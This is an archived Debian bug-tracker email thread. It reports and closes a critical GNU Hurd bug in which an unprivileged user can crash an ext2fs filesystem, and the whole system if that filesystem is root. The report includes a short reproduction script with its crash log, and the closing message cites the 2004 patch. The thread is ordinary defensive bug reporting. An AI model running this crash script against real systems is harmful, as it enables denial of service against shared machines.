[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Bug#190732: marked as done (hurd: non-priviledged user may crash filesys
|
From: |
Debian Bug Tracking System |
|
Subject: |
Bug#190732: marked as done (hurd: non-priviledged user may crash filesystem) |
|
Date: |
Mon, 01 Mar 2004 11:03:09 -0800 |
Your message dated Mon, 1 Mar 2004 19:18:16 +0100
with message-id <20040301181816.GA16922@blackbird.oase.mhn.de>
and subject line hurd: non-priviledged user may crash filesystem
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 25 Apr 2003 12:05:35 +0000
>From rmh@khazad.dyndns.org Fri Apr 25 07:05:33 2003
Return-path: <rmh@khazad.dyndns.org>
Received: from 80-24-13-86.uc.nombres.ttd.es (getyouriso.dyndns.org)
[80.24.13.86]
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 1991xK-0005xc-00; Fri, 25 Apr 2003 07:05:31 -0500
Received: from aragorn ([192.168.0.3])
by getyouriso.dyndns.org with esmtp (Exim 3.35 #1 (Debian))
id 1993A8-0001PG-00; Fri, 25 Apr 2003 15:22:48 +0200
Received: from rmh by aragorn with local (Exim 3.35 #1 (Debian))
id 1991wd-0002Nf-00; Fri, 25 Apr 2003 14:04:47 +0200
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Robert Millan <rmh@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: hurd: non-priviledged user may crash filesystem
X-Mailer: reportbug 2.10.1
Date: Fri, 25 Apr 2003 14:04:47 +0200
Message-Id: <E1991wd-0002Nf-00@aragorn>
Sender: Robert Millan <rmh@khazad.dyndns.org>
Delivered-To: submit@bugs.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0
tests=BAYES_01,HAS_PACKAGE
version=2.53
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.53 (1.174.2.15-2003-03-30-exp)
Package: hurd
Version: 20021118-2
Severity: critical
by exploiting this bug, a non-priviledged user is able to crash
a filesystem on which he/she has read/write access to. if that
filesystem is /, then is able to crash the whole system.
test log:
$ dd if=/dev/zero of=./fs ibs=32k count=10 ; mke2fs -o hurd ./fs
[...]
$ settrans -cafg ./mnt /hurd/ext2fs ./fs
$ cat cbtf
#!/bin/sh -x
# crashes the filesystem on which it is being run.
# (caution: if that filesystem is /, crashes the system)
rm -rf no-write dir
mkdir -p no-write/dir
chmod 555 no-write
mv no-write/dir .
$ ./cbtf
+ rm -rf no-write dir
+ mkdir -p no-write/dir
+ chmod 555 no-write
+ mv no-write/dir .
ext2fs: ../../libdiskfs/dir_renamed.c: 202: diskfs_rename_dir: Assertion `tmpnp
= fnp' failed.
mv: cannot move `no_write/dir' to `./dir': Computer bought the farm
-- System Information:
Debian Release: testing/unstable
Architecture: hurd-i386
Kernel: GNU aragorn 0.3 GNUmach-1.2/Hurd-0.3 i386-AT386
Locale: LANG=C, LC_CTYPE=C
Versions of packages hurd depends on:
ii libc0.3 2.3.1-5 GNU C Library: Shared libraries an
ii libncursesw5 5.2.20020112a-8 Shared libraries for terminal hand
-- no debconf information
---------------------------------------
Received: (at 190732-done) by bugs.debian.org; 1 Mar 2004 18:48:16 +0000
>From mbanck@gmx.net Mon Mar 01 10:48:16 2004
Return-path: <mbanck@gmx.net>
Received: from mail.gmx.net [213.165.64.20]
by spohr.debian.org with smtp (Exim 3.35 1 (Debian))
id 1AxsSe-00015W-00; Mon, 01 Mar 2004 10:48:16 -0800
Received: (qmail 9380 invoked by uid 65534); 1 Mar 2004 18:47:44 -0000
Received: from dj.stud.chemie.tu-muenchen.de (EHLO blackbird.oase.mhn.de)
(129.187.128.65)
by mail.gmx.net (mp005) with SMTP; 01 Mar 2004 19:47:44 +0100
X-Authenticated: #686195
Received: from mbanck by blackbird.oase.mhn.de with local (Exim 3.36 #1
(Debian))
id 1Axrzd-0004Pc-00
for <190732-done@bugs.debian.org>; Mon, 01 Mar 2004 19:18:17 +0100
Date: Mon, 1 Mar 2004 19:18:16 +0100
From: Michael Banck <mbanck@debian.org>
To: 190732-done@bugs.debian.org
Subject: Re: hurd: non-priviledged user may crash filesystem
Message-ID: <20040301181816.GA16922@blackbird.oase.mhn.de>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.5.1+cvs20040105i
Sender: Michael Banck <mbanck@gmx.net>
Delivered-To: 190732-done@bugs.debian.org
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2004_03_01
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=0.0 required=4.0 tests=none autolearn=no
version=2.60-bugs.debian.org_2004_03_01
X-Spam-Level:
This bug has been fixed by the recent upload of hurd_20040301-1. One
patch has been applied to fix this bug:
2003-06-11 Ognyan Kulev <ogi@fmi.uni-sofia.bg>
* dir-renamed.c (diskfs_rename_dir): Check permissions to remove
FROMNAME before any modification could take place. Check result
of removing the from node.
The still not applied patch for libdiskfs contained in the bug log is
also available at
http://savannah.gnu.org/patch/?func=detailitem&item_id=1839
Thanks,
Michael
| [Prev in Thread] |
Current Thread |
[Next in Thread] |
- Bug#190732: marked as done (hurd: non-priviledged user may crash filesystem),
Debian Bug Tracking System <=